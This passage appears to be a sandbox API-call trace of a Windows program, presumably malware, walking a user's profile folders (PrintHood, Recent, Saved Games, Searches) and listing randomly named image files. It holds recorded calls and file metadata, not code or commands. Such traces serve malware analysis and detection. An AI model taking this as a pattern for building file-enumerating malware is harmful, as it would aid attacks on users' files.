cFileName="3iuJ8NWM9DLs-PEj.bmp", cAlternateFileName="3IUJ8N~1.BMP")) returned 1 [0056.407] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf58b2bf0, ftCreationTime.dwHighDateTime=0x1d4d39a, ftLastAccessTime.dwLowDateTime=0xa98a9b0, ftLastAccessTime.dwHighDateTime=0x1d4c846, ftLastWriteTime.dwLowDateTime=0xa98a9b0, ftLastWriteTime.dwHighDateTime=0x1d4c846, nFileSizeHigh=0x0, nFileSizeLow=0x12725, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6othUkm8ekP4Ec7T.gif", cAlternateFileName="6OTHUK~1.GIF")) returned 1 [0056.407] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c4cc940, ftCreationTime.dwHighDateTime=0x1d4d0d3, ftLastAccessTime.dwLowDateTime=0x27e0f020, ftLastAccessTime.dwHighDateTime=0x1d4c9ba, ftLastWriteTime.dwLowDateTime=0x27e0f020, ftLastWriteTime.dwHighDateTime=0x1d4c9ba, nFileSizeHigh=0x0, nFileSizeLow=0x1283a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="80aZ2tp21.gif", cAlternateFileName="80AZ2T~1.GIF")) returned 1 [0056.407] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60bab670, ftCreationTime.dwHighDateTime=0x1d4d0ee, ftLastAccessTime.dwLowDateTime=0x9b5ef470, ftLastAccessTime.dwHighDateTime=0x1d4d08b, ftLastWriteTime.dwLowDateTime=0x9b5ef470, ftLastWriteTime.dwHighDateTime=0x1d4d08b, nFileSizeHigh=0x0, nFileSizeLow=0x16378, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9e3N7.bmp", cAlternateFileName="")) returned 1 [0056.407] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9555cca0, ftCreationTime.dwHighDateTime=0x1d4d538, ftLastAccessTime.dwLowDateTime=0x530dfa50, ftLastAccessTime.dwHighDateTime=0x1d4cd5b, ftLastWriteTime.dwLowDateTime=0x530dfa50, ftLastWriteTime.dwHighDateTime=0x1d4cd5b, nFileSizeHigh=0x0, nFileSizeLow=0x66fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B DJ6bHqinsD9h4.bmp", cAlternateFileName="BDJ6BH~1.BMP")) returned 1 [0056.407] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a851d00, ftCreationTime.dwHighDateTime=0x1d4cee2, ftLastAccessTime.dwLowDateTime=0xa52268c0, ftLastAccessTime.dwHighDateTime=0x1d4c686, ftLastWriteTime.dwLowDateTime=0xa52268c0, ftLastWriteTime.dwHighDateTime=0x1d4c686, nFileSizeHigh=0x0, nFileSizeLow=0xfbf5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="b7pJttHK9Z.jpg", cAlternateFileName="B7PJTT~1.JPG")) returned 1 [0056.407] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0056.407] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8225370, ftCreationTime.dwHighDateTime=0x1d4d226, ftLastAccessTime.dwLowDateTime=0x67fb63a0, ftLastAccessTime.dwHighDateTime=0x1d4cd90, ftLastWriteTime.dwLowDateTime=0x67fb63a0, ftLastWriteTime.dwHighDateTime=0x1d4cd90, nFileSizeHigh=0x0, nFileSizeLow=0x13a8e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eE0Pj7G5aEffKAC-zZKZ.jpg", cAlternateFileName="EE0PJ7~1.JPG")) returned 1 [0056.407] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd90fef10, ftCreationTime.dwHighDateTime=0x1d4d30e, ftLastAccessTime.dwLowDateTime=0x6db0c130, ftLastAccessTime.dwHighDateTime=0x1d4c5e5, ftLastWriteTime.dwLowDateTime=0x6db0c130, ftLastWriteTime.dwHighDateTime=0x1d4c5e5, nFileSizeHigh=0x0, nFileSizeLow=0xd2f1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EOWcS-b-pHU1wro7.jpg", cAlternateFileName="EOWCS-~1.JPG")) returned 1 [0056.407] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd01e38b0, ftCreationTime.dwHighDateTime=0x1d4c7d5, ftLastAccessTime.dwLowDateTime=0xcb2471c0, ftLastAccessTime.dwHighDateTime=0x1d4ceb6, ftLastWriteTime.dwLowDateTime=0xcb2471c0, ftLastWriteTime.dwHighDateTime=0x1d4ceb6, nFileSizeHigh=0x0, nFileSizeLow=0xb22b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="G4kJhdDGPq3zd 8N.png", cAlternateFileName="G4KJHD~1.PNG")) returned 1 [0056.407] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5fb3fe0, ftCreationTime.dwHighDateTime=0x1d4cf62, ftLastAccessTime.dwLowDateTime=0x309e1e50, ftLastAccessTime.dwHighDateTime=0x1d4ca45, ftLastWriteTime.dwLowDateTime=0x309e1e50, ftLastWriteTime.dwHighDateTime=0x1d4ca45, nFileSizeHigh=0x0, nFileSizeLow=0xfbfe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="H4Ti7A LHpB.png", cAlternateFileName="H4TI7A~1.PNG")) returned 1 [0056.407] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1bc51f0, ftCreationTime.dwHighDateTime=0x1d4cf20, ftLastAccessTime.dwLowDateTime=0x716b01e0, ftLastAccessTime.dwHighDateTime=0x1d4d4be, ftLastWriteTime.dwLowDateTime=0x716b01e0, ftLastWriteTime.dwHighDateTime=0x1d4d4be, nFileSizeHigh=0x0, nFileSizeLow=0xf484, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hsPblQOgWlR.jpg", cAlternateFileName="HSPBLQ~1.JPG")) returned 1 [0056.407] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99b535f0, ftCreationTime.dwHighDateTime=0x1d4c620, ftLastAccessTime.dwLowDateTime=0xf05a3ac0, ftLastAccessTime.dwHighDateTime=0x1d4c8e8, ftLastWriteTime.dwLowDateTime=0xf05a3ac0, ftLastWriteTime.dwHighDateTime=0x1d4c8e8, nFileSizeHigh=0x0, nFileSizeLow=0x99d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IIQQGpJ.gif", cAlternateFileName="")) returned 1 [0056.407] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74411580, ftCreationTime.dwHighDateTime=0x1d4c73a, ftLastAccessTime.dwLowDateTime=0x73ade950, ftLastAccessTime.dwHighDateTime=0x1d4d116, ftLastWriteTime.dwLowDateTime=0x73ade950, ftLastWriteTime.dwHighDateTime=0x1d4d116, nFileSizeHigh=0x0, nFileSizeLow=0x89cd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lY0DCvr2.bmp", cAlternateFileName="")) returned 1 [0056.407] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb69c2b70, ftCreationTime.dwHighDateTime=0x1d4ccd7, ftLastAccessTime.dwLowDateTime=0x17ff2de0, ftLastAccessTime.dwHighDateTime=0x1d4d0e3, ftLastWriteTime.dwLowDateTime=0x17ff2de0, ftLastWriteTime.dwHighDateTime=0x1d4d0e3, nFileSizeHigh=0x0, nFileSizeLow=0x5d5e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mjvWTIfK-ga.gif", cAlternateFileName="MJVWTI~1.GIF")) returned 1 [0056.407] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x94c82620, ftCreationTime.dwHighDateTime=0x1d4c5e3, ftLastAccessTime.dwLowDateTime=0x94bfa4c0, ftLastAccessTime.dwHighDateTime=0x1d4c65e, ftLastWriteTime.dwLowDateTime=0x94bfa4c0, ftLastWriteTime.dwHighDateTime=0x1d4c65e, nFileSizeHigh=0x0, nFileSizeLow=0x18d31, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OkL4HKnkSYSJIwPNsR_.png", cAlternateFileName="OKL4HK~1.PNG")) returned 1 [0056.407] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x527b5a80, ftCreationTime.dwHighDateTime=0x1d4d17d, ftLastAccessTime.dwLowDateTime=0xf393b510, ftLastAccessTime.dwHighDateTime=0x1d4d0a2, ftLastWriteTime.dwLowDateTime=0xf393b510, ftLastWriteTime.dwHighDateTime=0x1d4d0a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pt3T5YLjsfWTS8bTn", cAlternateFileName="PT3T5Y~1")) returned 1 [0056.407] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ca7a240, ftCreationTime.dwHighDateTime=0x1d4ce0d, ftLastAccessTime.dwLowDateTime=0x539880a0, ftLastAccessTime.dwHighDateTime=0x1d4d2f9, ftLastWriteTime.dwLowDateTime=0x539880a0, ftLastWriteTime.dwHighDateTime=0x1d4d2f9, nFileSizeHigh=0x0, nFileSizeLow=0x157ab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RIK1-BUGPQEVJirKz6N.jpg", cAlternateFileName="RIK1-B~1.JPG")) returned 1 [0056.407] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4d70800, ftCreationTime.dwHighDateTime=0x1d4d1f6, ftLastAccessTime.dwLowDateTime=0x8e210db0, ftLastAccessTime.dwHighDateTime=0x1d4c77c, ftLastWriteTime.dwLowDateTime=0x8e210db0, ftLastWriteTime.dwHighDateTime=0x1d4c77c, nFileSizeHigh=0x0, nFileSizeLow=0x67fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rZNT8ree-9bG.bmp", cAlternateFileName="RZNT8R~1.BMP")) returned 1 [0056.407] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c6823c0, ftCreationTime.dwHighDateTime=0x1d4d3e4, ftLastAccessTime.dwLowDateTime=0x92bdb960, ftLastAccessTime.dwHighDateTime=0x1d4d387, ftLastWriteTime.dwLowDateTime=0x92bdb960, ftLastWriteTime.dwHighDateTime=0x1d4d387, nFileSizeHigh=0x0, nFileSizeLow=0xd1e2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TSPFwFmW70A.png", cAlternateFileName="TSPFWF~1.PNG")) returned 1 [0056.407] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5db5ed0, ftCreationTime.dwHighDateTime=0x1d4d18b, ftLastAccessTime.dwLowDateTime=0x1f2e2ea0, ftLastAccessTime.dwHighDateTime=0x1d4d466, ftLastWriteTime.dwLowDateTime=0x1f2e2ea0, ftLastWriteTime.dwHighDateTime=0x1d4d466, nFileSizeHigh=0x0, nFileSizeLow=0x10a5b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="urTk_7SAl.png", cAlternateFileName="URTK_7~1.PNG")) returned 1 [0056.407] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6cf65960, ftCreationTime.dwHighDateTime=0x1d4c5ba, ftLastAccessTime.dwLowDateTime=0x61fdf110, ftLastAccessTime.dwHighDateTime=0x1d4d4ad, ftLastWriteTime.dwLowDateTime=0x61fdf110, ftLastWriteTime.dwHighDateTime=0x1d4d4ad, nFileSizeHigh=0x0, nFileSizeLow=0x1065f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="V8xM.jpg", cAlternateFileName="")) returned 1 [0056.408] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbc0430, ftCreationTime.dwHighDateTime=0x1d4d2e1, ftLastAccessTime.dwLowDateTime=0x3996550, ftLastAccessTime.dwHighDateTime=0x1d4cc33, ftLastWriteTime.dwLowDateTime=0x3996550, ftLastWriteTime.dwHighDateTime=0x1d4cc33, nFileSizeHigh=0x0, nFileSizeLow=0x1829d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WX2M.gif", cAlternateFileName="")) returned 1 [0056.408] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1126cfa0, ftCreationTime.dwHighDateTime=0x1d4c8e1, ftLastAccessTime.dwLowDateTime=0x51b3c80, ftLastAccessTime.dwHighDateTime=0x1d4d509, ftLastWriteTime.dwLowDateTime=0x51b3c80, ftLastWriteTime.dwHighDateTime=0x1d4d509, nFileSizeHigh=0x0, nFileSizeLow=0xd9a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Y_Dz9ypir.gif", cAlternateFileName="Y_DZ9Y~1.GIF")) returned 1 [0056.408] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1126cfa0, ftCreationTime.dwHighDateTime=0x1d4c8e1, ftLastAccessTime.dwLowDateTime=0x51b3c80, ftLastAccessTime.dwHighDateTime=0x1d4d509, ftLastWriteTime.dwLowDateTime=0x51b3c80, ftLastWriteTime.dwHighDateTime=0x1d4d509, nFileSizeHigh=0x0, nFileSizeLow=0xd9a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Y_Dz9ypir.gif", cAlternateFileName="Y_DZ9Y~1.GIF")) returned 0 [0056.408] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.408] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257668 | out: hHeap=0x660000) returned 1 [0056.408] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0056.408] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.408] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\") returned="PrintHood\\" [0056.408] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.408] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.408] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebd0 | out: hHeap=0x660000) returned 1 [0056.408] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.408] PathFindFileNameW (pszPath="") returned="" [0056.408] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1126cfa0, ftCreationTime.dwHighDateTime=0x1d4c8e1, ftLastAccessTime.dwLowDateTime=0x51b3c80, ftLastAccessTime.dwHighDateTime=0x1d4d509, ftLastWriteTime.dwLowDateTime=0x51b3c80, ftLastWriteTime.dwHighDateTime=0x1d4d509, nFileSizeHigh=0x0, nFileSizeLow=0xd9a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Y_Dz9ypir.gif", cAlternateFileName="Y_DZ9Y~1.GIF")) returned 0xffffffff [0056.408] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b3e8 | out: hHeap=0x660000) returned 1 [0056.408] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257668 | out: hHeap=0x660000) returned 1 [0056.408] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0056.408] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.408] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\") returned="Recent\\" [0056.408] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.409] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.409] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebd0 | out: hHeap=0x660000) returned 1 [0056.409] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.409] PathFindFileNameW (pszPath="") returned="" [0056.409] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1126cfa0, ftCreationTime.dwHighDateTime=0x1d4c8e1, ftLastAccessTime.dwLowDateTime=0x51b3c80, ftLastAccessTime.dwHighDateTime=0x1d4d509, ftLastWriteTime.dwLowDateTime=0x51b3c80, ftLastWriteTime.dwHighDateTime=0x1d4d509, nFileSizeHigh=0x0, nFileSizeLow=0xd9a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Y_Dz9ypir.gif", cAlternateFileName="Y_DZ9Y~1.GIF")) returned 0xffffffff [0056.409] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261948 | out: hHeap=0x660000) returned 1 [0056.409] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257668 | out: hHeap=0x660000) returned 1 [0056.409] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0056.409] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.409] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="Saved Games\\" [0056.409] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.409] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.409] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebd0 | out: hHeap=0x660000) returned 1 [0056.409] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.409] PathFindFileNameW (pszPath="") returned="" [0056.409] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.409] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b3e8 | out: hHeap=0x660000) returned 1 [0056.409] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.410] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0056.410] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0056.410] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.410] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257668 | out: hHeap=0x660000) returned 1 [0056.410] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0056.410] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.410] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="Searches\\" [0056.410] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.410] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.410] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebd0 | out: hHeap=0x660000) returned 1 [0056.410] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.410] PathFindFileNameW (pszPath="") returned="" [0056.410] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.410] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0056.410] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.410] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0056.410] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0056.410] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0056.410] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0056.410] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.410] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257668 | out: hHeap=0x660000) returned 1 [0056.410] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: 